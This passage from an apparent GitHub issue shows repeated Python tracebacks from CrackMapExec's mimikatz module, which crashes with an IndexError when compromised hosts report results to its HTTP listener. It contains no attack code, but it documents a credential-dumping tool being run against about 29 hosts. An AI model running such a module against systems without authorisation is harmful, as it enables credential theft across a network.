File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ 172.27.2.120 [*] - - "POST / HTTP/1.1" 200 - | |
---------------------------------------- | |
Exception happened during processing of request from ('172.27.2.120', 49553) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ [*] Waiting on 29 host(s) | |
MIMIKATZ [*] Waiting on 29 host(s) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment